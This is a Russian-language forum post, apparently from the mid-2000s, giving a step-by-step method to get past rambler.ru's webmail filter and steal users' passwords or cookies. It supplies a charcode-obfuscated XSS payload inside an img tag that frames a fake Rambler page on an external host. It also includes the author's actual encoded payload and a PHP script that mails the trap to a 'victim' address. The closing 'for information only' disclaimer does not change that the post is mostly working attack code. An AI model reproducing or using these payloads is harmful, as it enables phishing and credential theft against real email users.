ISRAEL
Сообщений: 6
Оценки: 0
Присоединился: 2005-10-03 06:20:04
|
Обман фильта на сервере rambler.ru Ну я решыл разместить ето как информацыю для пользователей сайта рамблера ето только для тех у кого браузер ie ! И так как можно обмануть фильтр ? Сначала делаем какую либо страничку у вас на сайте с каким неть злым скриптом ето может быть всякий скрипт от угона куков до угона паролей я использовал страничку скрипта auth известный как Угон паролей ! тест скрипта находится тут Смотреть страничку теста Канечно для рамблера надо будит хакеру сделать страничку подобную самому рамблеру ! Кокда сделали уже страничку со скриптом надо её поместить в frame вот пример Code <frameset rows="*"><frame name="main" src="http://yousite.ru/some.php"><noframes><body></body></noframes></frameset></html> Зашевровать в чар код frame вам надо зайти Сюда и ввести frame в чар код Теперь надо использовать елементы java вот пример Code javascript:document.write(String.fromCharCode(your charcode)); На рамблере ето надо использовать таким примером ! Code <img g=">" src="javascript:document.write(String.fromCharCode(Ваш frame на сам скрипт зашыфрованый в чар коде));"> вот вас ето надо послать пользователю рамблера. Я покажу какой код я послал Code <img g=">" src="javascript:document.write(String.fromCharCode(60, 102, 114, 97, 109, 101, 115, 101, 116, 32, 114, 111, 119, 115, 61, 34, 42, 34, 62, 60, 102, 114, 97, 109, 101, 32, 110, 97, 109, 101, 61, 34, 109, 97, 105, 110, 34, 32, 115, 114, 99, 61, 34, 104, 116, 116, 112, 58, 47, 47, 109, 111, 100, 101, 114, 115, 46, 117, 99, 111, 122, 46, 114, 117, 47, 109, 97, 105, 108, 46, 104, 116, 109, 34, 62, 60, 110, 111, 102, 114, 97, 109, 101, 115, 62, 60, 98, 111, 100, 121, 62, 60, 47, 98, 111, 100, 121, 62, 60, 47, 110, 111, 102, 114, 97, 109, 101, 115, 62, 60, 47, 102, 114, 97, 109, 101, 115, 101, 116, 62, 60, 47, 104, 116, 109, 108, 62));"> Послать можно етот код в формате html сделав такой php скрипт ! Code <?php // Тема письма $subject = 'chat@mail.ru'; // сообщение $message = ' <html> <head> Сюда надо вам поставить гатовый код с java и с чар кодом. </body> </html> '; // Поселаем с декодом странички можно укозать любой но желательно "charset=windows-1251" $headers = 'MIME-Version: 1.0' . "\r\n"; $headers .= 'Content-type: text/html; charset=iso-8859-1' . "\r\n"; // Добавки к письму $headers .= 'To:jertva@rambler.ru' . "\r\n"; // Кому послать (почта жертвы) $headers .= 'From:vahapochta@mail.ru' . "\r\n"; // От кого // Послать mail($to, $subject, $message, $headers); ?> Кокда жертва получить песьмо кокда нажмёт чтоб прочесть автоматом переведёт на страничку вашего скрипта не изменая адреса вверху браузера вот примеры 89 1011 информация вылаженная на этом сайте только для онзнакомления и не расценивается как шаг к действиям.
">
|